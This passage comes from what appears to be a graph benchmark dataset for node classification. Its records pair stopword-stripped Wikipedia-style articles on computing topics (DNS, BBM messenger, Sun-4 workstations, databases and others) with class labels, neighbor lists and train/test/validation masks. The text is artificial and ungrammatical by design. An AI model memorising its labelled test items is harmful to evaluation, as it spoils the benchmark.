root name servers actually involved relatively small fraction requests theory authoritative name servers sufficient operation internet however authoritative name servers operating every dns query must start recursive queries root zone domain name system user system would implement resolver software capable recursive operation improve efficiency reduce dns traffic across internet increase performance end-user applications domain name system supports dns cache servers store dns query results period time determined configuration time-to-live domain name record question typically caching dns servers also implement recursive algorithm necessary resolve given name starting dns root authoritative name servers queried domain function implemented name server user applications gain efficiency design operation combination dns caching recursive functions name server mandatory functions implemented independently servers special purposes internet service providers typically provide recursive caching name servers customers addition many home networking routers implement dns caches recursors improve efficiency local network client side dns called dns resolver resolver responsible initiating sequencing queries ultimately lead full resolution translation resource sought e.g. translation domain name ip address dns resolvers classified variety query methods recursive non-recursive iterative resolution process may use combination methods non-recursive query dns resolver queries dns server provides record either server authoritative provides partial result without querying servers case caching dns resolver non-recursive query local dns cache delivers result reduces load upstream dns servers caching dns resource records period time initial response upstream dns servers recursive query dns resolver queries single dns server may turn query dns servers behalf requester example simple stub resolver running home router typically makes recursive query dns server run user isp recursive query one dns server answers query completely querying name servers needed typical operation client issues recursive query caching recursive dns server subsequently issues non-recursive queries determine answer send single answer back client resolver another dns server acting recursively behalf resolver negotiates use recursive service using bits query headers dns servers required support recursive queries iterative query procedure process dns resolver queries chain one dns servers server refers client next server chain current server fully resolve request example possible resolution www.example.com would query global root server com server finally example.com server name servers delegations identified name rather ip address means resolving name server must issue another dns request find ip address server referred name given delegation subdomain domain delegation provided circular dependency case name server providing delegation must also provide one ip addresses authoritative name server mentioned delegation information called glue delegating name server provides glue form records additional section dns response provides delegation authority section response glue record combination name server ip address example authoritative name server example.org ns1.example.org computer trying resolve www.example.org first resolves ns1.example.org ns1 contained example.org requires resolving example.org first presents circular dependency break dependency name server top level domain org includes glue along delegation example.org glue records address records provide ip addresses ns1.example.org resolver uses one ip addresses query one domain authoritative servers allows complete dns query standard practice implementing name resolution applications reduce load domain name system servers caching results locally intermediate resolver hosts results obtained dns request always associated time live ttl expiration time results must discarded refreshed ttl set administrator authoritative dns server period validity may vary seconds days even weeks result distributed caching architecture changes dns records propagate throughout network immediately require caches expire refreshed ttl rfc 1912 conveys basic rules determining appropriate ttl values resolvers may override ttl values protocol supports caching sixty-eight years caching negative caching i.e caching fact non-existence record determined name servers authoritative zone must include start authority soa record reporting data requested type exists value minimum field soa record ttl soa used establish ttl negative answer reverse dns lookup query dns domain names ip address known multiple domain names may associated ip address dns stores ip addresses form domain names specially formatted names pointer ptr records within infrastructure top-level domain arpa ipv4 domain in-addr.arpa ipv6 reverse lookup domain ip6.arpa ip address represented name reverse-ordered octet representation ipv4 reverse-ordered nibble representation ipv6 performing reverse lookup dns client converts address formats querying name ptr record following delegation chain dns query example assuming ipv4 address 208.80.152.2 assigned wikimedia represented dns name reverse order 2.152.80.208.in-addr.arpa dns resolver gets pointer ptr request begins querying root servers point servers american registry internet numbers arin 208.in-addr.arpa zone arin servers delegate 152.80.208.in-addr.arpa wikimedia resolver sends another query 2.152.80.208.in-addr.arpa results authoritative response users generally communicate directly dns resolver instead dns resolution takes place transparently applications web browsers e-mail clients internet applications application makes request requires domain name lookup programs send resolution request dns resolver local operating system turn handles communications required dns resolver almost invariably cache see containing recent lookups cache provide answer request resolver return value cache program made request cache contain answer resolver send request one designated dns servers case home users internet service provider machine connects usually supply dns server user either configured server address manually allowed dhcp set however systems administrators configured systems use dns servers dns resolvers point separately maintained name servers organization event name server thus queried follow process outlined either successfully finds result returns results dns resolver assuming found result resolver duly caches result future use hands result back software initiated request large isps configured dns servers violate rules disobeying ttls indicating domain name exist one name servers respond applications web browsers maintain internal dns cache avoid repeated lookups via network practice add extra difficulty debugging dns issues obscures history data caches typically use short caching times – order one minute internet explorer represents notable exception versions ie 3.x cache dns records 24 hours default internet explorer 4.x later versions ie 8 decrease default time value half hour may changed modifying default configuration google chrome triggers specific error message dns issues dns server broken google chrome returns error message domain name system includes several functions features hostnames ip addresses required match one-to-one relationship multiple hostnames may correspond single ip address useful virtual hosting many web sites served single host alternatively single hostname may resolve many ip addresses facilitate fault tolerance load distribution multiple server instances across enterprise global internet dns serves purposes addition translating names ip addresses instance mail transfer agents use dns find best mail server deliver e-mail mx record provides mapping domain mail exchanger provide additional layer fault tolerance load distribution dns used efficient storage distribution ip addresses blacklisted email hosts common method place ip address subject host sub-domain higher level domain name resolve name record indicates positive negative indication example e-mail servers query blacklist.example find specific host connecting blacklist many blacklists either subscription-based free cost available use email administrators anti-spam software provide resilience event computer network failure multiple dns servers usually provided coverage domain top level global dns thirteen groups root name servers exist additional copies distributed worldwide via anycast addressing dynamic dns ddns updates dns server client ip address on-the-fly example moving isps mobile hot spots ip address changes administratively dns protocol uses two types dns messages queries replies format message consists header four sections question answer authority additional space header field flags controls content four sections header section consists following fields identification flags number questions number answers number authority resource records rrs number additional rrs field 16 bit long appears order given identification field used match responses queries flag field consists sub-fields follows flag header ends four 16-bit integers contain number records sections follow order question section simpler format resource record format used sections record usually 1 contains following fields domain name broken discrete labels concatenated label prefixed length label dns primarily uses user datagram protocol udp port number 53 serve requests dns queries consist single udp request client followed single udp reply server length answer exceeds 512 bytes client server support edns larger udp packets used otherwise query sent using transmission control protocol tcp tcp also used tasks zone transfers resolver implementations use tcp queries domain name system specifies database information elements network resources types information elements categorized organized list dns record types resource records rrs record type name number expiration time time live class type-specific data resource records type described resource record set rrset special ordering dns resolvers return entire set upon query servers may implement round-robin ordering achieve load balancing contrast domain name system security extensions dnssec work complete set resource record canonical order sent internet protocol network records use common format specified rfc 1035 name fully qualified domain name node tree wire name may shortened using label compression ends domain names mentioned earlier packet substituted end current domain name free standing used denote current origin type record type indicates format data gives hint intended use example record used translate domain name ipv4 address ns record lists name servers answer lookups dns zone mx record specifies mail server used handle mail domain specified e-mail address rdata data type-specific relevance ip address address records priority hostname mx records well known record types may use label compression rdata field unknown record types must rfc 3597 class record set internet common dns records involving internet hostnames servers ip addresses addition classes chaos ch hesiod hs exist class independent name space potentially different delegations dns zones addition resource records defined zone file domain name system also defines several request types used communication dns nodes wire performing zone transfers axfr/ixfr edns opt domain name system supports wildcard dns records specify names start asterisk label '* e.g. *.example dns records belonging wildcard domain names specify rules generating resource records within single dns zone substituting whole labels matching components query name including specified descendants example following configuration dns zone x.example specifies subdomains including subdomains subdomains x.example use mail exchanger mx a.x.example record a.x.example needed specify mail exchanger ip address result excluding domain name subdomains wildcard matches additional mx record subdomain a.x.example well wildcarded mx record subdomains must also defined dns zone role wildcard records refined rfc 4592 original definition rfc 1034 incomplete resulted misinterpretations implementers original dns protocol limited provisions extension new features 1999 paul vixie published rfc 2671 superseded rfc 6891 extension mechanism called extension mechanisms dns edns introduced optional protocol elements without increasing overhead use accomplished opt pseudo-resource record exists wire transmissions protocol zone files initial extensions also suggested edns0 increasing dns message size udp datagrams dynamic dns updates use update dns opcode add remove resource records dynamically zone database maintained authoritative dns server feature described rfc 2136 facility useful register network clients dns boot become otherwise available network booting client may assigned different ip address time dhcp server possible provide static dns assignments clients originally security concerns major design considerations dns software software deployment early internet network open participation general public however expansion internet commercial sector 1990s changed requirements security measures protect data integrity user authentication several vulnerability issues discovered exploited malicious users one issue dns cache poisoning data distributed caching resolvers pretense authoritative origin server thereby polluting data store potentially false information long expiration times time-to-live subsequently legitimate application requests may redirected network hosts operated malicious intent dns responses traditionally cryptographic signature leading many attack possibilities domain name system security extensions dnssec modify dns add support cryptographically signed responses dnscurve proposed alternative dnssec extensions tsig add support cryptographic authentication trusted peers commonly used authorize zone transfer dynamic update operations domain names may used achieve spoofing effects example paypa1.com different names yet users may unable distinguish graphical user interface depending user chosen typeface many fonts letter l numeral 1 look similar even identical problem acute systems support internationalized domain names many character codes iso 10646 may appear identical typical computer screens vulnerability occasionally exploited phishing techniques forward-confirmed reverse dns also used help validate dns results device looking dns record must communicate dns server considerable attention given adverse privacy implications even dns records easily read modified spoofed due security extensions person access dns server traffic stream wire may little difficulty matching ip address device often identifies user websites email domains visit track often records queried since dns records typically expire must requeried regularly dns also leak otherwise secure private connections attention paid configuration times dns used bypass firewalls malicious persons exfiltrate data since often seen innocuous two main approaches use counter privacy issues dns right use domain name delegated domain name registrars accredited internet corporation assigned names numbers icann organizations opennic charged overseeing name number systems internet addition icann top-level domain tld maintained serviced technically administrative organization operating registry registry responsible operating database names within authoritative zone although term often used tlds registrant person organization asked domain registration registry receives registration information domain name registrar authorized accredited assign names corresponding zone publishes information using whois protocol 2015 usage rdap considered icann publishes complete list tlds tld registries domain name registrars registrant information associated domain names maintained online database accessible whois service 290 country code top-level domains cctlds domain registries maintain whois registrant name servers expiration dates etc information instance denic germany nic holds de domain data 2001 generic top-level domain gtld registries adopted so-called thick registry approach i.e keeping whois data central registries instead registrar databases top-level domains com net thin registry model used domain registry e.g. godaddy bigrock pdr verisign etc. etc holds basic whois data i.e. registrar name servers etc. organizations registrants using org hand public interest registry exclusively domain name registries often called network information centers nic also function registrars end-users addition providing access whois datasets top-level domain registries domains com net org use registry-registrar model consisting many domain name registrars method management registry manages domain name database relationship registrars registrants users domain name customers registrar cases additional subcontracting resellers domain name system defined request comments rfc documents published internet engineering task force internet standards following list rfcs define dns protocol rfcs advisory nature may provide useful information despite defining neither standard bcp rfc 1796 rfcs official status unknown due age clearly labeled",
    "neighbors": [
      10242,
      7683,
      1030,
      3592,
      9737,
      8202,
      11,
      8204,
      9233,
      8211,
      9238,
      3609,
      6681,
      6682,
      9243,
      10269,
      10271,
      6689,
      35,
      9251,
      2085,
      7208,
      1067,
      5166,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3643,
      5179,
      3133,
      4158,
      5181,
      10300,
      6209,
      6723,
      11332,
      10309,
      8265,
      8777,
      8779,
      4687,
      1618,
      1108,
      1634,
      10341,
      8807,
      10344,
      9834,
      3695,
      115,
      4723,
      4725,
      2679,
      119,
      4729,
      1658,
      7802,
      4224,
      10368,
      5250,
      5251,
      9860,
      8837,
      5254,
      649,
      138,
      651,
      9868,
      11407,
      11408,
      3218,
      9365,
      11413,
      152,
      1177,
      10392,
      1692,
      157,
      2206,
      3742,
      161,
      8865,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      2222,
      6318,
      2736,
      6319,
      2739,
      8373,
      182,
      6651,
      9909,
      4793,
      6330,
      1723,
      7865,
      4797,
      702,
      8386,
      7364,
      11461,
      4294,
      8905,
      1229,
      5843,
      8404,
      9429,
      9939,
      6871,
      10461,
      7391,
      3297,
      7908,
      3813,
      3814,
      10471,
      2797,
      11502,
      751,
      8432,
      8946,
      5875,
      11001,
      3322,
      8956,
      2816,
      4355,
      9987,
      3847,
      8976,
      1297,
      7441,
      4883,
      7957,
      10005,
      5402,
      5405,
      10014,
      5407,
      11554,
      2339,
      8998,
      8487,
      9511,
      5421,
      5935,
      7983,
      7984,
      10035,
      6456,
      5433,
      2362,
      8504,
      9532,
      829,
      4414,
      5437,
      5438,
      5440,
      10748,
      11579,
      2373,
      10058,
      849,
      6993,
      1876,
      11607,
      2904,
      7003,
      4956,
      5469,
      5470,
      5471,
      1888,
      5472,
      10589,
      1893,
      3941,
      871,
      11112,
      361,
      2922,
      5482,
      367,
      6000,
      5492,
      8054,
      8055,
      10102,
      10103,
      10104,
      891,
      6524,
      7037,
      2430,
      2431,
      11647,
      2945,
      1410,
      6531,
      10115,
      6541,
      914,
      7570,
      5012,
      4505,
      9114,
      5531,
      5536,
      929,
      10144,
      10659,
      933,
      2983,
      8622,
      6576,
      6577,
      10160,
      2996,
      5045,
      10171,
      3006,
      3519,
      8130,
      1989,
      9670,
      8648,
      3018,
      10698,
      9676,
      2509,
      9677,
      2003,
      5078,
      471,
      3032,
      5591,
      6103,
      8669,
      5598,
      2527,
      3551,
      8670,
      10723,
      5093,
      10727,
      5608,
      3564,
      5102,
      11246,
      11250,
      4085,
      507,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 2888,
    "label": 2,
    "text": "Words_(Unix):words unix words standard file unix unix-like operating systems simply newline-delimited list dictionary words used instance spell-checking programs words file usually stored debian ubuntu file provided package provider packages etc fedora arch file provided package",
    "neighbors": [
      5492
    ],
    "mask": "Train"
  },
  {
    "node_id": 2889,
    "label": 4,
    "text": "GateKeeper_(access_control_device):gatekeeper access control device gatekeeper wireless proximity-based access control authentication device allows user automatically lock computer walking away unlock walking back untethered labs american computer security firm led ceo siddharth potbhare created original gatekeeper 2014 gatekeeper consists key fob device usb dongle transmit wireless signal software manage user credentials device also functions key finder using bluetooth low energy 4.0 locate gatekeeper within proximate adjustable range 30 feet indoors 100 feet outdoors gatekeeper software uses dashboard displays device signal strength allows users select configure lock settings manage user credentials set range computer detects device presence gatekeeper software provides user options enable two-factor authentication 2-fa computer access requiring user enter pin carry gatekeeper login usb dongle lock ever removed computer software immediately locks computer gatekeeper enterprise software integrates gatekeeper hardware allows administrator control deployment management gatekeepers network administrator set security policies gather log data auditing conduct productivity analysis deploy updates client software december 2017 untethered labs announced kickstarter would release halberd key fob new hardware design according company halberd larger design new processor added accelerometer improve device performance battery life halberd subsequently reached funding goal 25,000 raising 50,000 28 days 400 backers expected released january 2018 company also plans release compatible software mac linux systems well single sign-on capabilities 2018",
    "neighbors": [
      7983,
      2737,
      10801,
      5433,
      11611,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2890,
    "label": 4,
    "text": "Endurability:endurability telecommunication endurability property system subsystem equipment process enables continue function within specified performance limits extended period time usually months despite severe natural man-made disturbance nuclear attack loss external logistic utility support endurability compromised temporary failures local capability exists restore maintain system subsystem equipment process acceptable performance level",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2891,
    "label": 5,
    "text": "Equivalent_pulse_code_modulation_noise:equivalent pulse code modulation noise telecommunication equivalent pulse code modulation pcm noise amount noise power frequency-division multiplexing fdm wire communication channel necessary approximate judgment speech quality created quantizing noise pcm channel",
    "neighbors": [
      7490,
      7108
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2892,
    "label": 2,
    "text": "BBM_(software):bbm software bbm formerly known full name blackberry messenger proprietary mobile instant messenger videotelephony application included blackberry devices allows messaging voice calls blackberry os blackberry 10 ios android windows mobile users consumer edition ios android bbm consumer developed indonesian company emtek license blackberry limited formerly known research motion consumer edition blackberry os blackberry 10 well paid enterprise edition called bbm enterprise formerly known bbm protected developed fully blackberry limited bbm consumer shut 31 may 2019 however paid enterprise version software bbme still running messages sent via bbm sent internet used blackberry pin system past many service providers allowed sign-in bbm using dedicated blackberry data plan exchanging messages possible single person via dedicated discussion chat groups allowed multiple blackberry devices communicate single session addition offering text-based instant messages bbm also allowed users send pictures voicenotes audio recordings files 16 mb share real time location map stickers wide selection emojis communication possible blackberry devices late 2013 bbm released ios android systems 300 million stickers shared daily approximately 150,000 bbm voice calls placed 190 million bbm users worldwide 2015 blackberry infrastructure handled 30 petabytes data traffic month early 2013 bbm original mobile-first messaging service popular started lose rivals april 2016 indonesia country bbm popular messaging app installed 87.5 android devices country blackberry messenger launched august 1 2005 release blackberry messenger 5.0 blackberry allows users use qr code add respective friends lists rather using numeric pin identification email address associated user blackberry recent blackberry devices also exchange bbm contacts using near field communication technology users also set animated gif pictures display pictures although animated pictures 32kb size limit release blackberry messenger 6.0 introduced additional traits update focused social communication mediums including 'bbm connected apps allow user invite friends share favourite blackberry applications late-december 2011 audience measurement company bbm canada sued rim infringing trademark bbm using initialism blackberry messenger bbm canada used initialism former name bureau broadcast measurement company cited received phone calls users believed connected rim however rim asked case dropped two organizations different industries suit dismissed bbm canada ultimately re-branded numeris release blackberry messenger 7.0 december 2012 voice chat bbm voice call introduced bbm protected secure encrypted enterprise-level messenger launched june 2014 june 27 2016 announced indonesia-based emtek group acquired licensing rights bbm blackberry limited would provide bbm api emtek part six-year 207 million deal 2017 bbm servers moved data center canada google cloud platform-based data center asia april 18 2019 bbm announced discontinue bbm consumer service globally may 31 year users switch paid bbme enterprise version messenger bbm widely reputed uptime reliability however october 10 2011 users service north america europe middle east africa widely affected outage provider rim uk headquarters slough berkshire outage lasted two days blackberry messenger reported unavailable thus seriously affecting company reputation blackberry ceo thorsten heins announced may 14 2013 blackberry messenger available ios android summer 2013 would mark first steps blackberry messenger reaching beyond platform never available competing hardware rumoured blackberry messenger would launch june 27 2013 android ios later denied blackberry actual release date yet announced june 21 2013 blackberry messenger application spotted play store however turned fake worldwide release bbm android slated september 21 2013 officially announced blackberry also announced app would require android versions older 4.x.x ice cream sandwich blackberry confirmed bbm iphone would release september 22 day later official android release would work iphones running ios 6 later however worldwide rollout bbm android iphone september 21 2013 1.1 million android users downloaded leaked blackberry messenger apk caused blackberry cease launching blackberry messenger android ios platforms bbm officially released ios android october 21 2013 5 million downloads recorded first 8 hours release bbm late 2013 no.1 free app app store google play store total app 10 million downloads first day 24 february 2014 blackberry officially confirmed bbm windows phone nokia x would released q2 2014 nokia confirmed bbm would preinstalled nokia x devices june 2016 bbm longer offered windows store april 18 2019 announced bbm consumer service android ios shutting may 31 2019 bbm multi-platform offer personal chats group chat 250 people status updates send receive messages 2000 characters bbm channels bbm voice bbm shop available android ios early january 2014 beta update bbm android released testers update included bbm voice bbm channels february 2014 update 2.0.0.13 officially released android ios users containing awaited features along features including new emoticons changes including new look updates featuring choices show contacts channels filters november 4 2014 bbm scored 1 7 points electronic frontier foundation secure messaging scorecard lost points communications encrypted key provider n't access i.e communications end-to-end encrypted users ca n't verify contacts identities past messages secure encryption keys stolen i.e app provide forward secrecy code open independent review i.e code open-source security design properly documented recent independent code audit enterprise version bbm protected initially scored 3 7 points updated 5 7 points additional information provided blackberry reflected eff changelog dated november 14 2014 lost points past messages secure encryption keys stolen code open independent review may 2011 rim claimed 43 million active blackberry messenger users worldwide 2013 2014 number bbm users increases sharply 100 million 2016 bbm reached 889 million users world ranked 2nd top messaging apps first place belongs telegram january 2018 least 63 million monthly users indonesia",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      6281,
      4746,
      1036,
      9101,
      11408,
      10900,
      3610,
      410,
      3228,
      5406,
      10271,
      2208,
      3105,
      9511,
      1962,
      7983,
      9519,
      7857,
      8758,
      1467,
      6208,
      9408,
      1218,
      6982,
      6855,
      2760,
      4937,
      1738,
      2892,
      3152,
      3284,
      8413,
      4318,
      3812,
      4068,
      6628,
      9063,
      9572,
      3949,
      3959,
      7928,
      10748,
      9341,
      6271
    ],
    "mask": "Test"
  },
  {
    "node_id": 2893,
    "label": 5,
    "text": "Mozilla_localizations:mozilla localizations mozilla localizations localized versions mozilla products usually entails product translated certain language language region specific features added localization normally carried teams volunteers mozilla firefox heavily localized cross-platform web browser date first official release november 2004 available 28 different locales including british english/american english european spanish/argentine spanish chinese traditional chinese characters/simplified chinese characters firefox 4 initially shipped 80 locales introduced 10 new locales including 6 african languages following table lists releases firefox precursors microsoft windows operating system listing locales available end version releases mozilla thunderbird email application somewhat fewer localised releases initial release us english since released 45 languages 47 locales though much mozilla web content localized extent localization varies locale locale example mozilla firefox privacy policy currently available english",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      3462,
      6791,
      7943,
      8584,
      9736,
      6797,
      1295,
      7951,
      2579,
      2836,
      7572,
      10006,
      11418,
      7965,
      9757,
      8351,
      10910,
      5026,
      1834,
      9770,
      7340,
      559,
      7983,
      1713,
      9908,
      4661,
      7861,
      3639,
      11449,
      4797,
      5054,
      64,
      9152,
      9281,
      10057,
      11466,
      5707,
      7885,
      4048,
      7889,
      10834,
      4310,
      5078,
      6231,
      6747,
      8923,
      10078,
      737,
      482,
      10722,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      10860,
      8557,
      494,
      1520,
      7152,
      115,
      9843,
      6133,
      7543,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 2894,
    "label": 5,
    "text": "Extended_superframe:extended superframe telecommunications extended superframe esf t1 framing standard esf sometimes called d5 framing first used d5 channel bank invented 1980s preferred predecessor superframe includes cyclic redundancy check crc 4000 bit/s channel capacity data link channel used pass out-of-band data equipment requires less frequent synchronization earlier superframe format provides on-line real-time monitoring circuit capability operating condition extended superframe 24 frames long framing bit frame used following manner crc computed using polynomial 24×193 4632 bits framing data previous superframe crc bits forced 1 purpose crc computation purpose small crc take immediate action keep statistics performance link like predecessor superframe every sixth frame least-significant data bit used robbed-bit signaling call supervision state however four bits abcd per channel per extended superframe rather two bits ab provided per superframe unlike superframe possible avoid robbed-bit signalling send call supervision data link instead",
    "neighbors": [
      8192,
      4227,
      3156,
      11286
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2895,
    "label": 3,
    "text": "Sun-4:sun-4 sun-4 series unix workstations servers produced sun microsystems launched 1987 original sun-4 series vmebus-based systems similar earlier sun-3 series employing microprocessors based sun sparc v7 risc architecture place 68k family processors previous sun models models listed approximately chronological order 1989 sun dropped sun-4 name marketing purposes favor sparcstation sparcserver brands new models although early sparcstation/server models also assigned sun-4-series model numbers example sparcstation 1 also known sun 4/60 practice phased introduction sparcserver 600mp series 1991 term sun-4 continued used engineering context identify basic hardware architecture sparc-based sun systems sun 4/110 4/150 4/260 4/280 systems upgraded sun 4300 cpu board used sparcserver 300 series referred 4/310 4/350 4/360 4/380 respectively sun-4 architecture refers vme-based architecture described used sun 4/100 4/200 sparcserver 300 sparcserver 400 ranges sun-4 support included sunos 3.2 onwards solaris 2.1 2.4 openbsd netbsd also run sun-4 architecture families several variations sun-4 architecture subsequently developed used later computer systems produced sun vendors comprised",
    "neighbors": [
      3328,
      9090,
      9731,
      11269,
      7943,
      1801,
      4235,
      1809,
      4241,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      6187,
      3247,
      4144,
      9137,
      6322,
      10675,
      11440,
      2871,
      4664,
      4285,
      6464,
      7104,
      6338,
      9665,
      10436,
      3911,
      1480,
      8007,
      11132,
      9422,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      3431,
      11626,
      7148,
      7022,
      5872,
      5233,
      8179,
      5492,
      9333,
      6006,
      631,
      11636,
      11129,
      1786,
      1788,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 2896,
    "label": 3,
    "text": "System_573:system 573 system 573 series arcade system boards konami based original playstation hardware used primarily konami bemani series music video game arcades commonly dance dance revolution series introduced 1998 system 573 available two variants analog digital i/o boards dubbed bemani system 573 analog bemani system 573 digital respectively along third variant called system 573 satellite terminal allows 8 cabinets networked central one",
    "neighbors": [
      7234
    ],
    "mask": "Test"
  },
  {
    "node_id": 2897,
    "label": 4,
    "text": "Benson_K._Buffham:benson k. buffham benson kirk buffham november 26 1919 – april 24 2019 american intelligence official deputy director national security agency 1978 1980 time highest ranking civilian agency born november 26 1919 illinois buffham joined armed forces security agency 1949 went newly formed national security agency 1952 1955 buffham one first nsa employees attend national war college nsa served europe office chief field activities well various positions production organization including deputy assistant director production 1950 took part organizing inspector general office deputy directorship served london senior liaison officer retired 1980 buffham died april 2019 age 99",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      6343,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      10832,
      1714,
      4566,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 2898,
    "label": 3,
    "text": "Treasure_Island_(1984_video_game):treasure island 1984 video game treasure island 1984 computer game based book treasure island robert louis stevenson game player takes role jim hawkins protagonist book battle hordes pirates final showdown long john silver game uses flip-screen style programming done greg duddle music rendered david whittaker version commodore 64 msx released 1984 commodore plus/4 version 1985 start game jim escaped stockade unarmed one possible exit next screen right finds throwing pirate trick throwing cutlass obtain however would foolhardy kill pirate since pirate blocking access anything instead player find pirate blocking access exit perhaps power-up kill thus advancing progress game strategic rationing cutlasses i.e knowing pick use order progress around island major gameplay element none pirates move around throw cutlass jim moved range pirate question lose cutlass always another use pirate rarely throws one cutlass jim hit cutlass thrown touches pirate loses life starts beginning screen however moves way time cutlass lands ground throw pirate kill killed pirate disappears allowing jim pass changed theme pirates asia game re-released willow pattern adventure another adventure game named treasure island published windham classics year 1985",
    "neighbors": [
      9006,
      4110
    ],
    "mask": "Test"
  },
  {
    "node_id": 2899,
    "label": 8,
    "text": "WebSideStory:websidestory websidestory inc. later visual sciences founded blaise barrelet 1996 web analytics tool link directory products hitbox hbx company went public september 28 2004 nasdaq wssi 2006 websidestory acquired high-end private data analysis visualization software company visual sciences 57 million year acquisition websidestory rebranded visual sciences inc january 2008 visual sciences inc. acquired omniture nasdaq omtr 394 million websidestory founded headquartered san diego california websidestory originally launched saas business model charging customers monthly fee web analytics finding customers willing pay web analytics proved difficult websidestory pivoted offer limited version analytics product free exchange small advertising banner website users clicked banners directed list top sites owned websidestory creating advertising revenue opportunity unlike many late '90s internet startups websidestory raise angel funding venture capital became profitable customers displaying banners top site list late 1999 websidestory opted target larger brick-and-mortar businesses customers hitbox product customers opted pay in-depth statistics exchange removing traditional hitbox banner websites giving birth hbx product line websidestory financially sound shuttered free version hitbox associated advertising revenues company went public 2004 eventually purchased visual sciences adopting name visual sciences turn acquired omniture 2008 october 2009 omniture acquired adobe systems integrated adobe marketing cloud february 2005 websidestory acquired atomz customizable saas search service",
    "neighbors": [
      6576,
      467,
      4917
    ],
    "mask": "None"
  },
  {
    "node_id": 2900,
    "label": 4,
    "text": "Security_level_management:security level management security level management slm comprises quality assurance system electronic information security aim slm display security status transparently across company time make security measurable quantity transparency measurability form prerequisites making security proactively monitorable improved continuously slm oriented towards phases deming cycle/plan-do-check-act pdca cycle within scope slm abstract security policies compliance guidelines company transposed operative measureable specifications security infrastructure operative aims form security level reached security level checked permanently current performance security systems malware scanner patch systems etc. deviations recognised early adjustments made security system slm falls range duties chief security officer cso chief information officer cio chief information security officer ciso report directly executive board security data availability slm related disciplines security security event management siem analysts gartner summarise magic quadrant security information event management define follows … sim provides reporting analysis data primarily host systems applications secondarily security devices — support security policy compliance management internal threat management regulatory compliance initiatives sim supports monitoring incident management activities security organization … sem improves security incident response capabilities sem processes near-real-time data security devices network devices systems provide real-time event management security operations … sim sem relate infrastructure realising superordinate security aims descriptive strategic management system aims measures revisions actions derived slm unites requisite steps realising measurable functioning security structure management control cycle slm categorised strategic panoply governance via suitable organisation structures processes ensures supports corporate strategy objectives slm allows csos cios cisos prove slm contributing towards protecting electronic data relevant processes adequately therefore makes contribution part governance defining security level plan company specifies security policies executive management defines aims relation integrity confidentiality availability authority classified data order able verify compliance specifications concrete aims individual security systems company need derived abstract security policies security level consists collection measurable limiting threshold values example operative aims like anti-virus systems uk sites need up-to-date longer four hours publication current definition need derived superordinate security policies like employees able work without interrupted limiting threshold values specified separately individually different sites locations countries infrastructure on-site local determining factors need taken consideration example office buildings uk normally equipped high-speed dedicated lines wholly realistic limit deadline supplying computers newest anti-virus definitions hours factory asia slow modem link web realistic limiting value would set somewhat higher control manual control objectives information related technology cobit cobit provides companies instructions transposing subordinate abstract aims measurable aims steps collecting analysing data information current status systems gleaned log file status reports provided individual anti-virus anti-spyware anti-spam consoles monitoring reporting solutions analysing software applications software houses simplify accelerate data collection checking security level check slm prescribes continual reconciliation defined security level current measured values automated real-time reconciliation supplies companies permanent status report security status across locations adjusting security structure act efficient slm allows trend analyses long-term comparative assessments made rolling observation security level weak spots network identified early appropriate adjustments made proactively security systems besides defining specifications engineering introducing operating monitoring maintaining improving documented information security management system iso/iec 27001 also defines specifications implementing suitable security mechanisms infrastructure library itil collection best practices control processes goes far beyond security relation supplies criteria security officers conceive security independent qualitatively measurable service integrate universe business-process-oriented processes itil also works top policies processes procedures job-related instructions assumes superordinate also operative aims need planned implemented controlled evaluated adjusted",
    "neighbors": [
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2901,
    "label": 1,
    "text": "Database:database database organized collection data generally stored accessed electronically computer system databases complex often developed using formal design modeling techniques database management system dbms software interacts end users applications database capture analyze data dbms software additionally encompasses core facilities provided administer database sum total database dbms associated applications referred database system often term database also used loosely refer dbms database system application associated database computer scientists may classify database-management systems according database models support relational databases became dominant 1980s model data rows columns series tables vast majority use sql writing querying data 2000s non-relational databases became popular referred nosql use different query languages formally database refers set related data way organized access data usually provided database management system dbms consisting integrated set computer software allows users interact one databases provides access data contained database although restrictions may exist limit access particular data dbms provides various functions allow entry storage retrieval large quantities information provides ways manage information organized close relationship term database often used casually refer database dbms used manipulate outside world professional information technology term database often used refer collection related data spreadsheet card index size usage requirements typically necessitate use database management system existing dbmss provide various functions allow management database data classified four main functional groups database dbms conform principles particular database model database system refers collectively database model database management system database physically database servers dedicated computers hold actual databases run dbms related software database servers usually multiprocessor computers generous memory raid disk arrays used stable storage raid used recovery data disks fail hardware database accelerators connected one servers via high-speed channel also used large volume transaction processing environments dbmss found heart database applications dbmss may built around custom multitasking kernel built-in networking support modern dbmss typically rely standard operating system provide functions since dbmss comprise significant market computer storage vendors often take account dbms requirements development plans databases dbmss categorized according database model support relational xml type computer run server cluster mobile phone query language used access database sql xquery internal engineering affects performance scalability resilience security sizes capabilities performance databases respective dbmss grown orders magnitude performance increases enabled technology progress areas processors computer memory computer storage computer networks development database technology divided three eras based data model structure navigational sql/relational post-relational two main early navigational data models hierarchical model codasyl model network model relational model first proposed 1970 edgar f. codd departed tradition insisting applications search data content rather following links relational model employs sets ledger-style tables used different type entity mid-1980s computing hardware become powerful enough allow wide deployment relational systems dbmss plus applications early 1990s however relational systems dominated large-scale data processing applications remain dominant ibm db2 oracle mysql microsoft sql server searched dbms dominant database language standardised sql relational model influenced database languages data models object databases developed 1980s overcome inconvenience object-relational impedance mismatch led coining term post-relational also development hybrid object-relational databases next generation post-relational databases late 2000s became known nosql databases introducing fast key-value stores document-oriented databases competing next generation known newsql databases attempted new implementations retained relational/sql model aiming match high 